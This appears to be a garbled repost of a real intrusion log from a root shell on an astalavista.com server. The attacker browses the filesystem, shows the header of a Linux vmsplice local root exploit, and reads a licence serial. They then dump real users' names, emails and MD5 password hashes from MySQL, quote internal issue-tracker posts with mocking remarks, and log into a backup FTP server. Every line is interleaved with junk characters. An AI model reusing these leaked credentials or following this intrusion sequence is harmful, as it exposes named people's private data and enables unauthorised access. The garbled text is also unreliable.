3 x* |' v: W0 {+ T. `- e2 J?>
) k8 G' G0 M% U( b# o9 E7 r( \9 i/ e" B! H- q; N
sh-3.2# cd ..
; `; Z$ P$ l: A* O* ^sh-3.2# cd com
" j; [9 w$ ]$ a J9 ^( T9 W+ dsh-3.2# ls -la+ L$ _8 c& F2 P6 ?' u1 G
total 1412085 v$ Z8 d. B* U% E9 Z
drwx–x–x 10 com com 4096 Apr 28 12:40 .
) X3 ~3 w y+ ?3 S. ~) o( fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
H# X) ]7 A- s. e% Zdrwx—— 2 com com 4096 Jun 4 04:04 backups
* c+ V, s# A7 j! O# y-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
: R7 Y# _: k) c) r& m( H) Adrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
: J K9 \- }* L" D" D9 y. H, \* V-rw——- 1 com com 21880 Jun 2 08:07 .bash_history; r: w q T4 E" W
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout" F' k) [. H7 S5 B5 h* ]0 z( `
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
- ^9 M0 V& `* J( o& q# q2 l- c" J-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc9 F' i2 S9 g1 Z/ O8 N' h0 R( T; x) t, |
drwx–x–x 3 com com 4096 Jan 29 2008 domains2 \3 l/ v. ^+ @* i* F
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
) l" b2 ^) s8 t; ^ n2 c' `; `; wdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap& y1 B% [# Z' f% N
-rw——- 1 com com 69 Nov 18 2008 .lesshst
/ C* g# x# ]. O2 ^0 y$ V. {% z2 ~drwx—— 2 com com 4096 Sep 24 2007 mail
+ ~; j3 _! F5 m% k9 E-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history2 Y1 t, W) t' n& K4 L0 C
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp% A1 w( J! k, c
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html0 V2 Y$ [. C8 t3 j$ x) O
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
8 N0 n6 n7 @1 c& |; c1 gdrwx—— 2 com com 4096 Aug 26 2008 .ssh* l" S0 i s, { i3 G2 n8 p4 K- H
-rwx—— 1 com com 8515 Feb 10 2008 t
% J2 i# x' l$ I6 z-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
8 o+ l1 \+ E) f: l4 Ydrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp& F1 g5 \$ N. _6 Y5 \6 l
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
- G# s! [. q4 ^7 X, L( l-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql1 H3 G% b0 @* p9 w1 a% }
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
5 s! B* y& [8 z( y! Z% [- V-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
4 E- |4 h. Y3 K# V9 v+ r9 z; [6 }# I+ K, ^/ I# p: P" z: n$ A
sh-3.2# head t.c! Q) n0 D4 E$ N! \3 @
/*
. _7 S8 D- ^, ?3 }3 g$ e* jessica_biel_naked_in_my_bed.c, N4 M* Y, C5 v* e# N" i% J0 C" p( q
*
# `& l5 Y4 m F: y2 p3 d0 \* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura." S4 K! k* e5 A* {/ r, Z9 k
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.2 N4 k$ L8 l$ N8 Q
* Stejnak je to stare jak cyp a aj jakesyk rozbite. g; Q d5 \% i: |" T
*
. P; a. ~; F4 @& B4 M* Linux vmsplice Local Root Exploit
2 W& p3 i7 H9 B. {$ C* By qaaz( ^0 n! p" N' P7 }
*+ |) W( ]* S4 `& j
& Q; Z @8 U% _( G1 s- d' tsh-3.2# cd /
& A% s2 I( d. _! F: tsh-3.2# ls -la
: \9 a2 m l2 i' Xtotal 360
8 d( F: v0 d, I) z$ r, Jdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
* f7 s/ A. m9 Gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..9 i) q( R x; k# J+ k
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
2 D! @. O+ G' V1 G. m/ d+ A5 f-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
8 Y9 E4 N4 V! y-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db. v+ a; V8 u8 ~! R7 a% m
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck9 E" z" ?" P2 U$ S9 z
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
& S6 K. J8 S5 x' F; ydrwxr-xr-x 3 root root 4096 Dec 29 2007 backup6 `% `- A: o# E$ v6 Q
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin2 o5 r* J, Q5 G9 P# S* I( U+ r ^
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
! _9 T; }! O% \* _7 zdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev, ^0 r7 e7 n! a1 y
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
6 N# S- I5 C0 j- \1 |1 g' Mdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home9 }2 J; r7 f j0 w
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
2 n& U4 j4 ~* v! u+ J' s% zdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib0 z& W" r2 e5 F3 X
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
; i. v* `1 z' vdrwx—— 2 root root 16384 Sep 11 2007 lost+found
/ V0 u: g( {* [drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
3 v# S7 u+ \& b) A5 [* L# qdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc$ _5 @( \$ R' u; j, q* a5 U, Z
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt0 R+ N2 f+ d7 }- ^" N5 ?7 l- A
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
5 M4 w# m0 [: y/ W& G3 rdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
G3 t$ r( S1 }: p; x9 }# v* Sdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt, D# A8 ~) ^; `7 z
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
4 w( @4 T4 ?( V' w; \drwxr-x— 15 root root 4096 Jun 4 08:40 root
5 \1 @2 f/ [/ V6 N, fdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin9 P8 Y# p% E- @2 W4 x, L% X: e
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux6 Q+ r- j; F6 h/ k
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv5 L( d0 V% V1 B! H7 R
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys0 A( M% B( @* q" D: f( S
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp1 i$ o( s7 a3 Y2 G' W
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
( n/ {# t; I7 n- g0 Q4 R2 adrwxr-xr-x 26 root root 4096 Jun 4 03:16 var/ |6 b8 f! A, O
* j! u- g8 \" }. i+ l* _* ksh-3.2# cd opt* W/ K- `6 b+ X3 b
sh-3.2# ls -la8 a' R* D( V0 ~4 f
total 20 x: u; b0 C n) j/ {
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
% ^& z# H* v' O6 ]3 R% d, tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..5 t+ y1 s+ g, W" p6 t
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws; l. l) z4 Z& |8 P! ~9 i
# G% l S/ U+ W- o
sh-3.2# cd lsws/0 t* x9 T: w% D3 o% N
sh-3.2# ls -la
; K- |5 S+ W; f5 K& ototal 108. [4 W6 |9 ~* i: i7 }
drwxr-xr-x 15 root root 4096 Mar 20 2008 .8 Z) f0 B$ @3 H$ K
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
7 `- p0 x, v2 [% j- j* vdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons% z6 e5 `9 J! S6 S& R: o- d! G
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
. P8 [% v6 U: n; Ydrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate: s3 ?+ V7 A) _, g
drwxr-xr-x 2 root root 4096 May 29 15:10 bin0 J2 }9 C% m6 C' `+ `
drwx—— 4 apache apache 4096 Jun 3 02:43 conf3 p' P- i# S# R3 a$ Q {* g6 |4 s. B- K8 n
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
0 m+ @% ` u2 qdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
8 C" |2 d2 c5 kdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
& X* B' [5 l- X0 l% ~+ {drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
6 v# T1 |3 r/ _-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE- Q7 H. ~8 t N' a, @+ W2 x
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
! `) v* O# f+ r/ H$ O) k1 H-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
0 o- G6 v, V; M-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
# _! i2 g; H8 [6 n# wdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
5 z) {3 j7 ?1 Rdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
5 Y# k+ @5 Z4 X0 w; kdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild, t& b7 \$ u, c2 F ]* L# v) U4 [
drwxr-xr-x 3 root root 4096 Mar 20 2008 share x _% ]7 W. i, x- O$ \: j. k0 p
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
3 P) I- t8 J8 y ^# M# _. o3 l L r
7 M2 B0 K/ |6 r( O: A! _* wsh-3.2# cd conf7 Z: t; a* p- n# [
sh-3.2# ls -la1 F( u4 E5 R+ k! _. B
total 48& X( b; S" C# S. f! m& P T
drwx—— 4 apache apache 4096 Jun 3 02:43 .7 R1 K" [/ t0 z Y: K0 f1 t: B% h7 }3 D
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..1 ^5 G7 h, t6 k4 f5 {
drwx—— 2 apache apache 4096 Mar 20 2008 cert
" d! _( l) t7 X5 F, a& Q+ p-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
6 M/ j% g; r7 z M0 D-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak7 {* z! L- ?7 N/ `
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
- b/ y' q+ ?4 }& F7 V5 v! k-rw——- 1 apache apache 256 May 29 15:10 license.key& ^' X7 j5 m0 g3 N
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
1 p8 {+ w+ a; M, P, g; Z-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties# s" w- }& m. F: Z& i. w& g, N3 O( G, h
-rw——- 1 apache apache 20 May 29 15:10 serial.no
) ~, l/ t( a0 H" Fdrwx—— 2 apache apache 4096 Mar 20 2008 templates
0 B; u6 v! V2 k7 R2 i4 K, [4 ?9 I
sh-3.2# cat serial.no( S8 m7 {: Y2 y- H7 ^
IbDl-oVsO-CKqL-wVRa
1 R3 ?2 L' M2 h, P1 c' J0 I
. A9 z. D6 L: Xsh-3.2# mysql
: |3 Q/ N9 ]- UWelcome to the MySQL monitor. Commands end with ; or \g.
+ k! D7 E& \# F" rYour MySQL connection id is 286844! R- `1 `- d3 g) o d @
Server version: 5.0.45-community-log MySQL Community Edition (GPL)7 F# A8 |4 K% E; t( ^* F6 Q9 x4 f
$ D* b% `4 v! ]- U, S" r3 I
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.% A. M$ y1 a/ i2 a1 i" k8 y
2 M3 D+ A; r5 R6 q- r0 e" S
mysql> show databases;, K: d- N. U( ~! X
+———————–+ X8 f, _* f& B& X0 |% n
| Database |
$ X/ q% q7 L2 W) A2 g- ~" E3 {8 e+———————–+" t5 j, A" e( w7 A0 o. s
| information_schema |
m8 {" G4 N" T0 a| astanet_ads |
7 ]$ f4 T' ]: x; x| astanet_mailing_lists |: Y% U; k: j6 z: S7 p( s/ w
| astanet_mediawiki |* q$ l4 w& s" t% x' K. S
| astanet_membersystem |
6 ?' }% Y7 @, _| com_contrexx | {2 ?4 F$ a ]- B; x ^5 t
| com_contrexx2 |2 g4 S, |# W3 @( E# _. A1 i
| com_contrexx2_live |+ F5 f3 }2 Q) @. z: h6 Y) L
| da_roundcube |: p( z+ g9 |5 z- s" A$ a c. Q* d
| dolphin |
. k5 Q2 R( r) i, @7 Y| ideapool |' a `# W5 a0 C) z; h; H; l& f
| mysql |
+ k8 @$ g7 w" M( o| test |
7 K7 v8 {" H3 V9 }. l| yourmaster |
A% w7 _8 m( b+ g+———————–+' h I3 g1 @6 A; q/ Q7 u3 O8 y: ?
14 rows in set (0.00 sec)
7 d& L( z+ H8 e0 R5 _/ i0 @! r) n* K) y, f0 Q# ?
mysql> use ideapool* D% t& k/ E4 ]5 Y" s5 d+ e
Database changed
+ V7 e ?/ U/ H, c- m2 pmysql> show tables;$ P5 ]* q6 `) k; y& X, j j9 w1 `
+———————————–+. P8 F; [4 q. M# i" Y9 I
| Tables_in_ideapool |7 Q9 [5 p% c' m1 b& l$ U
+———————————–+
. w% {* B+ P+ L$ O9 G| eventum_columns_to_display |, K! X& M! d' N! Z- q, _: e1 ^
| eventum_custom_field |
! h/ O4 O% o) m1 e1 l* H| eventum_custom_field_option |0 l+ ^ H" C, A& X" b4 j0 H% [% _
| eventum_custom_filter |0 L, r5 H" T. P9 u. j% ~
| eventum_customer_account_manager |$ J. d @! k. d/ m0 n6 z
| eventum_customer_note |+ \7 D1 K- X; E0 M: v
| eventum_email_account |
2 C2 g4 J+ W6 i: j9 @; ]: _- i| eventum_email_draft |
+ \ Q2 a/ A g" W* v2 h( }| eventum_email_draft_recipient |
/ e h# j7 R2 N P| eventum_email_response |6 a" G# g7 n) p1 ~4 @
| eventum_faq |- m. Z9 r. E# o9 a
| eventum_faq_support_level |) A, b. { p i) V
| eventum_group |0 V/ o% i, a6 f r
| eventum_history_type |. O* d9 J5 Z, g9 {3 ^
| eventum_irc_notice |
% y; O9 V4 M/ ?. a+ q| eventum_issue |
2 n4 t) ?( W$ R" q| eventum_issue_association |
) V; Z# m# S9 P4 F* H| eventum_issue_attachment |& B5 Q+ r6 S: P4 s" @! I% m' z( ~0 j- E
| eventum_issue_attachment_file |
; O. ]% h+ N6 P. e- }2 p: }1 s| eventum_issue_checkin |
+ c$ O, T. f+ f* I# n3 A! T6 a/ ^| eventum_issue_custom_field |$ d# w, x% ?* G% U( v
| eventum_issue_history |
- @+ N. O, o) @$ o| eventum_issue_quarantine |: g4 B: k& y8 L! E* p9 b
| eventum_issue_requirement |
; c% v. |: M, f| eventum_issue_user |9 `) o2 O; {3 D5 y4 t
| eventum_issue_user_replier |, Z* |4 K1 n# l8 {) r8 W+ X) f
| eventum_link_filter |+ X3 y$ @9 V! G) d* Q, B% B' H
| eventum_mail_queue |- }5 t+ H6 k2 I
| eventum_mail_queue_log |
% \5 V" D( _4 X. ^# z| eventum_news |
0 h% x" C) _( m; g( L3 p" @8 p| eventum_note |
% ^2 d% M$ `- |, F! Z# E9 }5 B! m| eventum_phone_support |
/ z5 W% e" f% Z) j% t5 }( x| eventum_project |
1 t U+ N( |* y2 ^ @3 r: w| eventum_project_category |6 W2 Q- f6 U _
| eventum_project_custom_field |
" ^) c; b5 b: ^6 W( r| eventum_project_email_response |4 u' N2 b) G$ P! m% A% D
| eventum_project_field_display |
. g5 l+ B4 R( ~$ H4 N| eventum_project_group |" V( g2 Y; l3 l) w' G2 _
| eventum_project_link_filter |0 D7 I% Y' T, t$ N1 l' b3 t
| eventum_project_news |5 S1 H2 a. G0 [" n2 w0 C
| eventum_project_phone_category |6 g) J2 Z @* v* J' a0 P% q! s
| eventum_project_priority |
, v2 D; |6 L! d o0 C' l| eventum_project_release |
& w2 Z+ G3 Z* e! W% ?| eventum_project_round_robin |% V/ H5 d8 u! x" ~4 _) ?9 v* M
| eventum_project_status |7 ~3 ?3 j0 R8 V; A
| eventum_project_status_date |
- S( o2 D( c7 Q9 ~; H8 C; B| eventum_project_user |4 D9 o! k* O7 F( z& _. _
| eventum_reminder_action |
/ O+ v$ m( i) B7 i6 r; \| eventum_reminder_action_list |" N! Q3 z9 w/ R" m9 K& M( a
| eventum_reminder_action_type |2 g1 Q. h* o9 Q6 s$ q' J! L. P
| eventum_reminder_field |4 `8 T) P9 Y0 A$ s* N
| eventum_reminder_history |# @/ E1 |$ E" A) |
| eventum_reminder_level |
9 Q0 r) d' N, `) a) ?$ D% n| eventum_reminder_level_condition |
' a8 v& d2 k% Z$ d/ Y! _* U| eventum_reminder_operator |: A; k* P, W9 R, d# a. B r
| eventum_reminder_priority |4 Y8 Y0 V7 y- t) s
| eventum_reminder_requirement |4 ~. c$ H- v1 r. \ l8 `9 B2 ~+ Q
| eventum_reminder_triggered_action |6 r8 S" R8 N6 {! k$ _
| eventum_resolution |
( H6 _5 `, Z* L| eventum_round_robin_user |' i9 h2 s q( f7 {
| eventum_search_profile |) @3 L0 `/ c1 C" R- r
| eventum_status |+ @8 q q4 X, u( ]) e4 X2 Y
| eventum_subscription |
2 o3 U; Q! Q* o; Q2 d7 @# q| eventum_subscription_type |* |6 j# m5 ^/ B! u& `* M
| eventum_support_email |
2 G8 I# h+ n' N| eventum_support_email_body |
. S& q$ c4 U. L( L| eventum_time_tracking |3 a8 Z$ @0 _! n
| eventum_time_tracking_category |& s6 N7 @# i# G2 ^" S+ Q/ M
| eventum_user |! Z3 J5 u" N) E) @, _
+———————————–+
+ J" m5 U& h( j: X( X69 rows in set (0.00 sec)) D1 A9 O9 U. ~$ c2 h9 B) L
" @; e; ~1 h) Q% k) j8 O
mysql> describe eventum_user;
# A. E4 e1 t6 D) A2 L6 u+————————-+——————+——+—–+———————+—————-+
8 @ X) S/ O, |4 n. \, d| Field | Type | Null | Key | Default | Extra |
, @2 b! k# _0 w& K9 q# p0 l+————————-+——————+——+—–+———————+—————-+4 J/ F0 V' K5 _& n; p( E
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |) S) D3 N, v2 U! s& a' J
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |* I4 v% {4 P" a' V! o1 H8 @
| usr_customer_id | int(11) unsigned | YES | | NULL | |2 ^$ X( c" r8 Z. E
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
2 }$ q. l8 c" r% n| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
* p. F. A0 `8 x# j| usr_status | varchar(8) | NO | | active | |
/ ?4 N/ z w$ y# N; a; u0 B| usr_password | varchar(32) | NO | | | |) b( l# L; K, ?$ d2 Z5 g: C
| usr_full_name | varchar(255) | NO | | | |
. K- h7 X( E8 E2 ]8 c| usr_email | varchar(255) | NO | UNI | | |8 n& Z3 P+ W; s7 a4 ^. d
| usr_preferences | longtext | YES | | NULL | |
* }3 E9 _ U+ z0 K$ g| usr_sms_email | varchar(255) | YES | | NULL | |
+ o9 N/ E& s* }- B6 z& k| usr_clocked_in | tinyint(1) | YES | | 0 | |! w; m( R4 N0 r2 F0 {3 _5 k
| usr_lang | varchar(5) | YES | | NULL | |
- q, L5 M$ K# b: E) ~* ^& u+————————-+——————+——+—–+———————+—————-+
) A1 \0 D( x9 P' \3 ?' v% t13 rows in set (0.00 sec): |8 @& r" m0 ]" q
" `0 P" n4 V' j7 g1 N; L1 t% e
mysql> select usr_full_name,usr_email,usr_password from eventum_user;4 B3 B4 e0 O& M' P
+———————-+——————————-+———————————-+- G) c) h9 B4 o; F5 x
| usr_full_name | usr_email | usr_password |
8 _ L* V0 p; M+———————-+——————————-+———————————-+
. V! E& n" M+ X0 @& I- N# [+ J| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |7 E" {1 D# Z; F; |% y; K! R
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
- G0 Q6 {3 A/ x& H& z3 G6 y4 ^| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |" b4 a9 l, w& b& k3 ?
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
8 ~* F7 ]. N0 r/ I" z5 ?/ v| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |, U, h. P+ g# `" F! w: S6 f
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
' E; {; w3 Q8 ?! z| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |! Q# C6 v$ l. A1 C; X- L* _$ N
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
6 |6 n2 a4 W6 v| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
7 W4 v) K0 u7 J4 [+ \* @| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |+ _: r3 X. ?% h- x* I. x9 V
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |7 T; j. E+ N0 V$ r7 c9 c! M. N6 c
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
: x5 ^& b% Q! y- v! r| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |" M2 \3 w! E; e0 z* x: N1 Y: e
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |' `7 j- `2 m* s! `
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
* }2 Q, x8 O4 G5 a/ b3 z+———————-+——————————-+———————————-+
, N8 u0 \4 W2 `% }- E O6 g15 rows in set (0.00 sec)5 ^3 v# H2 }1 l7 j
V# Z# n: @! H. C
mysql> select iss_description from eventum_issue where iss_id = 43;8 k/ y1 ?. w3 _! D; t( ]$ f/ a
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+- O7 F, N6 Z! o G8 \9 W5 Y
| iss_description
5 d8 q' V, b6 t7 T! U5 C4 O- B|' g" ?' S+ B9 n$ Y
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+$ g3 ]0 @( {, A3 y$ W k
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be; F& E* C! l8 b7 \; S0 [
connected for 90 mins… 120mins… so what i propose is something like:3 h6 g+ i/ `7 k9 I9 {: M& ]
链接标记[url]http://www.surfthechannel.com/[/url]
; J4 \7 M9 _5 E1 L6 w) ?) wsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
% L3 m+ V3 m/ o8 o7 \like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t5 P* P3 W% S, u: K. H+ r& y& Q# g
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
1 H4 Q0 r6 j7 }+ u- zif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…( L& f/ A9 c. J6 U. b
' m0 D! |# F9 O0 mWe could also put advertisement during play on the flash video player itself… extra $$…
# l( O) y) V& N" g- L8 n( F
2 y4 t* B1 q& b( Q6 A9 _' qBy sykadul |7 F* k, _# v4 y$ O- u- \( b0 M' c
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+0 y7 H/ {. k' r5 B( [
1 row in set (0.00 sec)0 [9 q q( y/ O) K2 b6 r8 I! Z6 e! F
! W# e* z' h+ l5 E* f# B! z0 x
// Money and extra $$ is all they care about. remember that." A) D5 j; ]# r2 y' Q! g" Y! b. X
! L) ?! D8 K/ N1 k: O# X
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;( K: R/ m. y8 m0 y! n2 s# l4 d
+————————+——————————————————————————————————————————————————————————————————————————————-+- f9 S# d3 @% p! a9 o- j- l
| iss_summary | iss_description % Z. O6 T1 e7 G8 v; U
|
/ f9 T# ?" n: I+ e3 q4 Y+————————+——————————————————————————————————————————————————————————————————————————————-+
2 D$ J: a7 A) s- P5 L. G! W| Forum for REAL EXPERTS | Hello,0 P2 _" w' z6 }) e% n2 S" H
- ^7 f( c1 t. i X3 zIshtus and I,
7 R2 ]* Q+ C, o1 B1 z" @9 N
, ^$ p" J+ W5 L. O: m! D9 o+ M. uCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
5 U, F: [7 t, _0 b; U( ?ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..0 B( I2 p7 A, z h1 k) O5 y
; q) |$ r* ?3 j* @' G2 V
One example a friend of mine from coresecurity.com!
2 X$ k4 {" F% W, N5 [# z& E9 O6 u! O( g, B) k7 m4 g1 Y
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..# f' ?8 t3 l) n4 E; h2 ^) E) W
( r7 w4 c l, L; V4 V a3 [% \|
8 |' X# e/ M4 P# H( |1 l+————————+——————————————————————————————————————————————————————————————————————————————+( M7 U7 x" y5 J/ D4 w
1 row in set (0.00 sec)- Z; @1 [, M E# u' n7 T
( d: r8 E N! z3 w
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
! e5 V- {9 [" _, o9 Q2 o$ {7 y7 T3 \- K- k' L5 g
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
5 h8 ` p* W0 Q. S8 K' U+——————+———————————————————————————————+
, e1 |7 E R2 E& e0 B% U4 T| iss_summary | iss_description |7 k9 e! B5 @' f: R! Y' @% c: k
+——————+———————————————————————————————+- Q: A& ]( Y3 g% P
| Website guidance | Virtual Girl which guides you trought the website.1 H+ ^+ ^: V g8 O
u5 p, m+ |, k* f" I' A5 }We need a girl with who you can ( talk )!!!
& X6 t2 t2 I& ]# M$ \" tAlso for the News!! e% J& H" X. y4 L
So my suggestion is a girl who read you the news loud if you like!7 Y/ V7 @" F& b
you can choose between read yourselfe or she read it for you or both!
2 E) q D' s3 c; P8 S1 l0 B0 s C5 M6 y$ z* |5 I, Y% P4 p- H
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!: T9 Q" p0 L$ P. }
$ k( u' {. {. r
Have a look on the example girls!!
/ r+ R8 r' z; ?# A6 U- N T+ F3 }+ ^6 g$ \: n9 b
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
0 e& I/ ]0 ^/ g- C! A
6 u# B' c$ H: F3 Q9 ^or that" v7 n" J5 E8 I) F7 F
+ c. P2 i6 b, q- Y" u+ y
链接标记[url]http://www.yellostrom.de/[/url]7 B0 E, n7 o9 b6 a( n
w e# `4 w5 G& d|. D5 U ^- z! {+ r/ u/ E& j
+——————+———————————————————————————————+ ?4 C B% u. y' v3 P
1 row in set (0.00 sec)# P% @9 S2 E" U! e: c* @( a; v1 B
4 H' c ~' P. V7 ^4 C8 P6 u9 F
// ha ha.
$ r" D( e Z. A2 {0 I7 `& N1 Z* J6 \) j" F
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
) j& ?4 a' H3 @& i) c/ ?7 K3 z1 S+————————–+———————————————————————————————————–+8 k) J5 M' i- W* s! c. `- W& F
| iss_summary | iss_description |- t4 A3 T9 L$ w, k& Z9 Z
+————————–+———————————————————————————————————–+
9 P' r, p- q3 O+ @, D| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
2 b$ y. v. S) Z0 z6 `+ v+————————–+———————————————————————————————————–+
, }5 Q: D! o% c7 w$ L) k" O1 row in set (0.00 sec)
+ R6 t8 S4 ~, u {+ Y1 }/ e7 p
// LOL.
6 E8 L* a) h2 R! h/ Q& B
8 T4 {: _1 j! ]* a! c |$ H4 O2 Pmysql> exit/ M6 e1 ^, W0 w5 ~
Bye' O1 D( I& }( D8 h1 _. I* o6 U: X
1 o0 }+ Z, {, n
sh-3.2# ftp 212.254.194.163
- k/ g- j' o2 `1 j2 s$ nConnected to 212.254.194.163.
) b9 L3 M/ x9 O) R7 }4 {220 BackupCOM_VW FTP server ready. t+ D! T h. M" |. q+ Y6 D# N
504 AUTH: security mechanism ‘GSSAPI’ not supported.
& Q3 n* b; q' v: j504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.( K4 f& M/ g8 {7 o) ^8 n
KERBEROS_V4 rejected as an authentication type6 P% z( i2 w5 B: v% y3 R& r
Name (212.254.194.163:root): astalavista.com6 H D/ r4 e& u8 i/ M1 E+ T& u
331 Password required for astalavista.com.+ I1 R* N" F/ J% r
Password:
; E( j" w' ^* y6 z _230 User astalavista.com logged in.
3 B" {# p/ V+ p+ BRemote system type is UNIX.
# ?( \ G" K/ }* K' M, Z3 U9 J* dUsing binary mode to transfer files.
% L W' f& I+ ~7 fftp> ls -la
4 ?3 o Y+ J# D8 J4 B227 Entering Passive Mode (212,254,194,163,2,188)1 C3 Q1 F0 e) s
150 Opening BINARY mode data connection for ‘file list’. M8 g1 z, {/ r9 m" p
